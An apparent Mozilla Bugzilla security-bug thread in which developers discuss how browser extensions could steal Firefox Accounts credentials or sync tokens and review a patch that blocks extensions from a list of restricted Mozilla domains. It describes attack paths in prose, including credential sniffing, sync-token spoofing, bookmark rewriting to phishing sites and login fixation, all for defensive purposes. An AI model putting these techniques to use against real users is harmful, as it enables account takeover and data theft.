Currently WebExtensions can attach content scripts to accounts.firefox.com and listen to traffic using the webRequest API. That means an extension could intercept your user name and password for that site.
If an extension did that, then the argument is that then the extension would have access to all the data stored in the sync backend. That might be your complete browsing history, for example.
To do this an extension needs to ask for permission to accounts.firefox.com specifically, or <all_urls>. We are potentially asking the user to make the leap that access to <all_urls> might mean "all my browsing history" I've synced.
The developer could get access to this by asking for the history API, for example, but that warns the user (hopefully clearly) that they've asked for this.
This assumes that getting access to accounts.firefox.com means that a malicious extension can get access to the browsing history... so cc'ing rkelly for that. Pinging jkt for the security view of this.

> listen to traffic using the webRequest API [...] intercept your user name and password for that site
To be clear, the password doesn't transit the wire in plaintext, they'd have to get it directly out of the password field in the DOM.

(In reply to Ryan Kelly [:rfkelly] from comment #1)
> > listen to traffic using the webRequest API [...] intercept your user name and password for that site
>
> To be clear, the password doesn't transit the wire in plaintext, they'd have
> to get it directly out of the password field in the DOM.
But intercepting what's on the wire is sufficient to login to the user's account and run cracking attacks if they've chosen a weak password.

Note that extensions aren't the same as packet sniffers, they can use requestBody to get the unencrypted payload of a POST.
But ... an extension can do the same on google.com or facebook.com or whatever to swipe other valuable credentials. I don't think we should treat something differently just because we operate it unless we have a really specific and compelling reason to do so.

Just to check, I found I couldn't examine the requests made by the sync process to the server using webRequest. We specifically made the decision that system requests are not examinable by webRequest in bug 1279371 and others. However if I open a tab to accounts.firefox.com, or go to about:preferences#sync and sign in, the traffic is observable in webRequest.
The argument here, is that the storing of all your history and bookmarks on a Mozilla server is a feature of Firefox. And hence different from Google or Facebook.

I feel like we had an older bug where some of this stuff was discussed; :vladikoff do you recall?
The counterpoint is that users might reasonably expect e.g. a password-manager addon to work correctly on accounts.firefox.com, and I don't know whether we can enumerate a set of "safe" capabilities to expose that would allow this, without allowing more general access.

I don't know all the capabilities of accounts.firefox.com but here is what I know:
It has the following I do know of:
- Info:
- Username, password
- Other info: picture etc
- Devices linked
- Delete account
Which aren't problematic really other than annoying if exploited.
However given an extension could sniff credentials, then use these to modify what extensions a user has installed on sync. This would be considered an escape hatch on the current permission model.
I would personally suggest this should be restricted unless we have a clear use-case for not.
Even then I would suggest having a new keyword for restricted urls like: <possibly_insecure> which initially could be used internally by Mozilla signed extensions.
> I don't know whether we can enumerate a set of "safe" capabilities to expose that would allow this, without allowing more general access.
I don't think there is an alternative here either.

> However given an extension could sniff credentials, then use these to modify what extensions a user has installed on sync.
Oh yes, this is a really good point that I frequently forget about: if you can write data into sync for a user, you can change their list of synced addons, causing new webextensions to be installed.

Installing potentially malicious addon X to force an install of potentially malicious addon Y isn't that useful. Do the malicious work in addon X instead.
If I had access to your sync data, I'd look for the bookmark that points to your bank and rewrite it to my phishing site instead.

> Installing potentially malicious addon X to force an install of potentially malicious addon Y isn't that useful. Do the malicious work in addon X instead.
- I could ask for only *.firefox.com and gain any permission without ever asking for it
- Native messaging, <all_urls>, proxy are the areas I was thinking of
- I could replace existing extensions with fake ones too
- I suspect this exploit could be done with just active tab too
> bookmark that points to your bank and rewrite it to my phishing site instead.
Arguably, if we don't trust users are checking permissions then an extension could do this also with "bookmarks" and "history" too.

> Arguably, if we don't trust users are checking permissions then an extension
> could do this also with "bookmarks" and "history" too.
Let's not make the assumption that users aren't reading the permissions because then everything is moot and we can all just go home, or to the pub.

> Let's not make the assumption that users aren't reading the permissions because then everything is moot
I agree, I was inferring this from your previous statement:
> Installing potentially malicious addon X to force an install of potentially malicious addon Y isn't that useful. Do the malicious work in addon X instead.
If a user is checking the permissions they would see "active tab" permissions requested which results in their whole history/bookmarks/addons compromised.
I think we are in agreement here that this should be blocked.

In hindsight, I really should have made bug 1361953 a higher risk or chased this more - I was very surprised that it was still open, I thought we had found a clear resolution there. But on reflection, this isn't an easy problem to solve.
We need to do something here and it needs to be holistic. I've been doing some testing of accounts.ifirefox.com with an extensions with the <all_urls>, webRequest & webRequestBlocking permissions. With these three, a malicious extension can (for example):
* remove the CSP for accounts.ifirefox.com
* use location: to redirect resources (this would allow redirection of script resources, were it not for SRI)
* read the Authorization header on API requests (and thus spoof sync API requests)
* set fake CORS header so that accounts can be scraped (don't think that gives much in this case)
I'm worried we are just going to end up playing whack-a-mole here though. For example, consider all of the following which can be intercepted currently:
sync.services.mozilla.com
addons.cdn.mozilla.net
accounts-static.cdn.mozilla.net
api.accounts.firefox.com
oauth.accounts.firefox.com
profile.accounts.firefox.com
... etc
This seems like a problem waiting to happen. I at a bit of a loss on how to approach this, since I am not aware of a canonical list of subdomains and services that we need to protect here. And then what about services added in the future? I'm going to continue testing, and also talk to the folks (ekr and ckershb) who are looking at rationalise the privileges in Firefox front-end.
But if anyone can add more information here, i'm all ears.

(In reply to Ryan Kelly [:rfkelly] from comment #6)
> I feel like we had an older bug where some of this stuff was discussed;
> :vladikoff do you recall?
>
> The counterpoint is that users might reasonably expect e.g. a
> password-manager addon to work correctly on accounts.firefox.com, and I
> don't know whether we can enumerate a set of "safe" capabilities to expose
> that would allow this, without allowing more general access.
Maybe this: https://bugzilla.mozilla.org/show_bug.cgi?id=1258135 but there could more.
There was a related bug to this about content scripts also: `chrome:// scripts can be injected into accounts.firefox.com and are ignored by CSP rules` AKA https://bugzilla.mozilla.org/show_bug.cgi?id=1345210

(In reply to Chris Karlof [:ckarlof] from comment #3)
> Dan, I'm curious about your thoughts as well.
This is one of the downsides of using website UI rather than building it into the client (even if the implementation does an XHR/fetch and builds the UI client-side). We can protect special pages like about: from web extensions (but not from legacy add-ons, of course). See bug 1034526 and bugs duped to it.
We have the same problem with AMO. On the one had it's a website and it looks bad to prevent extensions from "enhancing" it like any other site ("favoritism!!"). On the other hand the original favoritism sin was giving that site extra powers in the first place, so that extensions abusing it were much worse than abusing a regular web page. We've really got to stop giving our own web pages magic powers.
Two bad choices: prevent legit extensions from doing helpful stuff on that site, or live with normal extensions (asking to modify all pages is common) having much more actual power than they realize. Given the choice I'd block extensions from mucking with FxA pages. When enough people complain that it's worth rewriting that functionality to have less power then we can unblock it.

(In reply to Daniel Veditz [:dveditz] from comment #15)
> We've really got to stop
> giving our own web pages magic powers.
accounts.firefox.com does have access to webChannels but note that the main "attack" described in this bug is stealing credentials from the login page on accounts.firefox.com, which would be an issue even if webChannels were stripped away.

> accounts.firefox.com does have access to webChannels but note that the main "attack" described
> in this bug is stealing credentials from the login page on accounts.firefox.com, which would
> be an issue even if webChannels were stripped away.
The inverse attack is also possible, a kind of login fixation: a malicious addon could inject scripts into accounts.firefox.com, fire some webchannel messages to sign the browser in to sync with an account under the attacker's control, and then snoop on whatever data the victim's browser syncs to that account.

It's also worth considering explicitly: what measures, if any, does Google take to prevent a Chrome extension from stealing your Google account password? I wasn't able to find any explicit information on this topic from a bit of searching around.

In the past they haven't, but I haven't checked recently. One consequence of preventing add-on access to accounts.firefox.com is that third-party password managers would not be able to automatically capture and fill on accounts.firefox.com.
My motivator for originally raising this with Andy was this update: https://dev.chromium.org/Home/chromium-security/quarterly-updates
Site Isolation
"Running an experiment in M63 to give process isolation to accounts.google.com, to improve Chrome Signin security."
Granted, it's not this issue exactly, but it made me think about what isolation we maybe should be providing in Firefox for Firefox Accounts that we're currently not.

It sounds like the main loss here is losing the ability for password managers to help with the Firefox Account login. At this point I think that's probably worth the loss in functionality for the possible security problems that could result. Marking as a P2 and we'll aim to get this done in the 59 or 60 cycle (more likely 60 at this point). If anyone has any concerns that about, please let me know.

So what are you explicitly planning to do here? Note that just blocking accounts.mozilla.com is not enough to mitigate risk here - we need to prevent access to all the domains I mentioned in comment 13, and probably others. If nothing else, the authorization header sent to sync.services.mozilla.com almost as sensitive as the user's password.
I don't have a canonical list currently, but I am working on a project with Christoph Kerschbaumer to try to enumerate all the semi-privileged origins in Firefox (included all the web pages with access to chrome features via various event/message passing APIs). Needinfo'ing myself to follow-up once we have that list.
I'm also wondering if WebRequest is the only threat here (cookies API? Others?)

The patch submitted creates a new list provided from these conversations however I think the controls of these functionality should be moved to:
https://dxr.mozilla.org/mozilla-central/source/browser/app/permissions
The problem being is some of these issues are just because they accept password input which doesn't have restricted APIs. This poses an issue in itself as we need to maintain this list somewhere as Paul mentioned.
Also this bug fixes an issue where "privacy.resistFingerprinting.block_mozAddonManager" actually allows content scripts on addons.mozilla.org due to the removal of the addon manager API.

> I don't have a canonical list currently, but I am working on a project with Christoph Kerschbaumer to try to enumerate all the semi-privileged origins in Firefox (included all the web pages with access to chrome features via various event/message passing APIs). Needinfo'ing myself to follow-up once we have that list.
It would be nice if we could unify this in the code somehow. The biggest problem I have with the patch above is it's a list that will get out of date easily.
If you have the ability to test some of the exploits you are worried about with that patch or provide some STRs this would be super helpful.
Do we also care about crash reporting being a vector here?

(In reply to Jonathan Kingston [:jkt] from comment #23)
> > I don't have a canonical list currently, but I am working on a project with Christoph Kerschbaumer to try to enumerate all the semi-privileged origins in Firefox (included all the web pages with access to chrome features via various event/message passing APIs). Needinfo'ing myself to follow-up once we have that list.
Re-adding this need-info
>
> It would be nice if we could unify this in the code somehow. The biggest
> problem I have with the patch above is it's a list that will get out of date
> easily.
At a minimum we need a something configurable - I think the list of domains you have here should be a pref, that so we can maintain it without changing code.
>
> If you have the ability to test some of the exploits you are worried about
> with that patch or provide some STRs this would be super helpful.
Well its not really exploits. It's just using the APIs as they are intended but on sensitive domains. The testing I have done so far has just been writing my own addons. But we really need automated tests to make sure we don't regress this. If you are asking "what are all the things we need to block?" I will post that as an attachment, since I have a list but I dont think its complete yet (basically just from the security model: https://docs.google.com/document/d/1u3IoSbMlMts_dZYkbQEXYY2VNOewTinpXtFCeEYdboo/edit#)
>
> Do we also care about crash reporting being a vector here?
I don't know how this is related ? Oh you mean should we stop extensions messing with crash reports? Yes we should, but I think we already do. Im not sure what the terminology is but I believe all network request initiated from chrome bypass the WebRequest API. (I've heard these called 'system requests'

So as for a proposal I think we need a preference which contains a blacklist of semi-privileged domains which we want to forbid extensions to have access to. And then we need a consistent approach for forbid access. The APIs and features that I am aware that need to take these semi-privileged domains into account. ( Andrew, Kris, others, please review this, this is best effort from my understanding of the code that I have reviewed).
1. Manifest Attributes
- Host Permissions
- must no be able to request a URL that matches the blacklist [1]
- <all_urls> must not include the blacklist
- "matches" parameter of content_scripts manifest key must follow the same behavior as host permission
2. APIs which respect host permissions (ie should not be allowed on blacklisted domain)
tabs.executeScript
contentScripts.register
WebRequest & WebRequestBlocking
cookies
activeTab MUST NOT grant access on semi-privileged domains
3. Sensitive APIs which are currently an issue
Proxy API - this basically does the same thing as web request, but its not origin bound.
Devtools - this currently can interact in a variety of ways including injecting script (see bug 1425197)
Devtools
[1] Does installation reject an addon that requests a blacklisted domain, or just silently not grant permission?

> [1] Does installation reject an addon that requests a blacklisted domain, or just silently not grant permission?
I think at least for now silently failing is fine. Especially as assume we decide mozilla.org or newsite.pocket.com is banned for extension compat, just breaking the script rather than breaking install is likely better.
I still have much more testing to do, we likely will want a test for each of these scenarios highlighted by Paul in Comment 25.

Hi Jonathan, for another bugzilla issue (which is listed in the ones blocked on this one) we going to introduce a similar check from privileged js code, do you mind to expose the new WebExtensionPolicy::IsRestrictedSite method also from the WebExtensionPolicy.webidl?
(as a side effect it would also allow to write unit tests for the WebExtensionPolicy::IsRestrictedSite method itself as an xpcshell test)

Reviewing :jkt patch (https://bugzilla.mozilla.org/attachment.cgi?id=8949037&action=diff) I could tell that it will not cover every cases.
The problem is not limited to semi-privileged related to mozilla URL. It is related to any Firefox feature running in privileged mode that is performing actions based on the informations exchanged with a remote server. For example, one could set up its own Firefox Account Server. Applying the proposed patch will obviously no prevent an extension to eavesdrop or spoofing sync data with a privately owned server.
In short term it could do it to minimize risk but in the end another solution should be put inplace.
A solution that I could think of for long term is having a "firefox privileged url" type for preferences. Then extension limitations should be applied to every URL flagged as "firefox privileged url". To enable this, one would have to go though all url used by privileged components to flag them as such.
Note:
- On a side note, considering introducing other types for preferences could be a good thng form a security perspective. For example, preference that are meant to have JSON in it could not be set to invalid JSON so that an attacker could exploit an error mishandling.

FLR: That seems out of scope here, we aren't trying to catch all internal browser calls to third party URLs. Granted we might want to consider that for a different bug especially for Tor users wishing to ensure the browser can't be intercepted to other calls. My understanding is Browser context calls are restricted from extensions in most cases anyway.
The scope of this bug actually is more about non privileged calls from content pages to URLs that have more permissions within the browser via other means. So accounts.firefox.com can allow the extension to modify the users sync account and escalate privileges etc. Given we are now using the pref, if there is a way for a user to sync to a different URL, we could edit the pref within the browser too.

Hey so unfortunately I won't be able to continue to work on this, I wrapped up the patch so that I think it could be continued to work on or just merge as is.
There isn't as many tests as I would like here but it feels pretty urgent to cover all the cases that Paul highlighted.
I hit some road bumps that really slowed me down here:
- xpcshell tests I couldn't get to work with a different hostname (mozilla.org), I added a new identity but it didn't proxy locally as I would have expected elsewhere.
- The pref isn't live which perhaps isn't a problem in product, however it makes testing pretty hard.
I need to move onto something else but I want to ensure this doesn't bitrot. Even if this doesn't cover all cases I think the patch is worth dropping in given the risks here.

Comment on attachment 8951578[details][diff][review]
bug-1415644-b.patch
Kris is a great pick to review this patch, especially given that most of the changes are applied on WebExtensionPolicy and ChannelWrapper.

Comment on attachment 8955844[details][diff][review]
Create a list of restricted domains
Review of attachment 8955844[details][diff][review]:
-----------------------------------------------------------------
Sorry for redirection but Shane should probably take a look at the webrequest bits.
This could use a test, as it is complete broken right now due to typo in the pref name...
Much more importantly though, is this really maintainable? How are we going to keep this list updated? Do new services that use Firefox accounts have to get a change to this pref shipped before they can be deployed?
::: toolkit/components/extensions/WebExtensionPolicy.cpp
@@ +35,5 @@
> <body>\n\
> </html>";
>
> +static const char kRestrictedDomainPref[] =
> + "extensions.webextensions.identity.redirectDomain";
redirectDomain -> restrictedDomains

(In reply to Andrew Swan [:aswan] from comment #44)
> This could use a test, as it is complete broken right now due to typo in the
> pref name...
No tests for security bugs until they ship.
> Much more importantly though, is this really maintainable? How are we going
> to keep this list updated? Do new services that use Firefox accounts have
> to get a change to this pref shipped before they can be deployed?
No idea.
> ::: toolkit/components/extensions/WebExtensionPolicy.cpp
> @@ +35,5 @@
> > <body>\n\
> > </html>";
> >
> > +static const char kRestrictedDomainPref[] =
> > + "extensions.webextensions.identity.redirectDomain";
>
> redirectDomain -> restrictedDomains
wat... I have no idea how that got changed. It was definitely the right pref when I tested.

(In reply to Andrew Swan [:aswan] from comment #44)
> Much more importantly though, is this really maintainable? How are we going
> to keep this list updated? Do new services that use Firefox accounts have
> to get a change to this pref shipped before they can be deployed?
Perhaps we can try (post-release) to tie the list to the intercepted requests / preffed-to-localhost domains in test prefs?

(In reply to :Gijs (under the weather; responses will be slow) from comment #48)
> Perhaps we can try (post-release) to tie the list to the intercepted
> requests / preffed-to-localhost domains in test prefs?
Assuming you're talking about build/pgo/server-locations.txt I'm not seeing a connection, there's not much overlap between the list of hosts in the attached patch and the contents of that file...
(In reply to Matthew N. [:MattN] (PM if requests are blocking you) from comment #49)
> Comparing to the default permissions in
> https://dxr.mozilla.org/mozilla-central/source/browser/app/permissions would
> also be helpful to catch new privileged origins.
Yeah, this would help us catch (some) sites to which the browser grants extra privileges but my understanding is that the patch attached here tries to enumerate all the domains that use Firefox accounts. Most of those sites don't have any special access to browser features, they just happen to use fxa for authentication. Relying on the browser having a complete and up-to-date list of such sites sounds like something almost guaranteed to fail.

(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #45)
> (In reply to Andrew Swan [:aswan] from comment #44)
> > This could use a test, as it is complete broken right now due to typo in the
> > pref name...
>
> No tests for security bugs until they ship.
Should still be a separate test patch.

Comment on attachment 8956152[details][diff][review]
Create a list of restricted domains
Looks reasonable for what its doing. While existing tests should cover most of this, I'd still like to see the test patch ready before landing since there are some differences (e.g. pref change support, lack of requestBody for our special flavour of website). I kind of question the pref observer...do we expect the restrictedDomains list to be modified at runtime, if so how is that happening (ie. do we intend to do hotfixes to update this or something)?

(In reply to Andrew Swan [:aswan] from comment #54)
> Maybe its best to have somebody with stronger c++ chops take a look at this,
> but doesn't this keep referencing (but never unrefing) the underlying
> AtomSet?
If you mean AddRefing, no, AtomSet is not refcounted. Get() returns a reference to the instance that is owned by the AtomSetPref.

Comment on attachment 8956152[details][diff][review]
Create a list of restricted domains
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Not terribly easily. It contains a list of interesting domains that a malicious extension might try to extract Mozilla services API/auth tokens from, but it doesn't suggest any particular reason that accessing those domains might be interesting.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
No.
Which older supported branches are affected by this flaw?
All.
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
No. It would not be hard to backport to 59 release, but it also would not be worth the risk.
How likely is this patch to cause regressions; how much testing does it need?
Not very likely. It should only affect extensions which access certain internal Mozilla domains, most of which are CDNs or API endpoints. Several of them already have restricted access, so the likelihood of this breaking legitimate production extensions is fairly low.

(In reply to FLR from comment #58)
> Comment on attachment 8956152[details][diff][review]
>
> Just wondering, wouldn't it be better if sub domains of the restricted
> domain list were also considered as restricted ?
Perhaps, but that check would be much more expensive.

(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #43)
> (In reply to Paul Theriault [:pauljt] from comment #42)
> > See also 1443073 - we need to do something about google analytics, too
> > right? No idea what though.
>
> Do we?
I didn't understand the nature of the mechanism you added. The attack I was thinking of was intercepting the loading of a script that is included on AMO. I assumed that for WebRequest, the blocking would be done on the request's URL, and thus intercepting google analytics on AMO would still be allowed (since it isn't on the blacklist). But I see from testing the check is on the URL of the document which triggered the request (is that correct?).
I was also concerned that if you intercepted google analytics on a different domain, you could poison the cache for AMO. But as far as I can from testing, modifications made by filterResponseData are not stored in the cache (as far as I can tell, only the original response is cached, not the modified one? Is that correct?).
So from what I can tell, any domain in this restricted list:
- can not have a content script injected into it (via manifest, contentScripts.register() or tabs.executeScript())
- webRequest events will not be sent for tabs with a document that matches one of the blocked domains
- can not use Devtools API to inject script (browser.devtools.inspectedWindow.eval)
Is my understanding correct? I've added this to the security model document [1]. Please let me know if Ive misunderstood anything here.
Note that one API that lives outside these restrictions is the Proxy API. This make sense I think: Proxy can already be used to intercept any URL, including system requests (like update requests etc)- which makes sense, otherwise it would break the usefulness of being able to set the network proxy. But our add-on review team should probably be aware of the sensitive nature of the Proxy permission.
[1] https://docs.google.com/document/d/1u3IoSbMlMts_dZYkbQEXYY2VNOewTinpXtFCeEYdboo/edit#

(In reply to Paul Theriault [:pauljt] from comment #64)
> (In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're
> blocked) from comment #43)
> So from what I can tell, any domain in this restricted list:
> - can not have a content script injected into it (via manifest,
> contentScripts.register() or tabs.executeScript())
> - webRequest events will not be sent for tabs with a document that matches
> one of the blocked domains
> - can not use Devtools API to inject script
> (browser.devtools.inspectedWindow.eval)
>
> Is my understanding correct? I've added this to the security model document
> [1]. Please let me know if Ive misunderstood anything here.
So, there are a few different sets of restrictions here:
- Extensions cannot see requests unless they have permissions for the domains of
both the requested URL and for the document requesting the URL. As of this bug,
that check also takes into account the restricted domains list.
- Extensions cannot modify requests if they don't have permission to see them,
per the above, or if the document the request belongs to has access to the
mozAddonManager API. As of this bug, this restriction also applies to the
StreamFilter API.
- Extensions cannot load content scripts into any domain that they do not have
host permissions for, any site that has access to the mozAddonManager API, or,
as of this bug, any domain on the restricted domains list.
- Extensions cannot make non-CORS requests to any domain they do not have host
permissions for or, as of this bug, any domain on the restricted domains list.
They can still make requests to domains with mozAddonManager access as long as
they are not also on the restricted domains list (which I believe they all are).
The behavior introduced by this bug is less lenient, since one of the concerns
was the possibility of getting access to Firefox Accounts tokens. We didn't have
that concern when restricting access to the mozAddonManager API.
> Note that one API that lives outside these restrictions is the Proxy API.
> This make sense I think: Proxy can already be used to intercept any URL,
> including system requests (like update requests etc)- which makes sense,
> otherwise it would break the usefulness of being able to set the network
> proxy. But our add-on review team should probably be aware of the sensitive
> nature of the Proxy permission.
I'm not especially concerned about the proxy API here. The sites that we're
restricting access to here, and all of the resources they load, should only be
accessible over HTTPS. Unless the proxy they're being forwarded to has a trusted
certificate for those sites, they shouldn't be able to cause any problems beyond
DOS. If they do have access to trusted certificates for those sites, we have
bigger problems.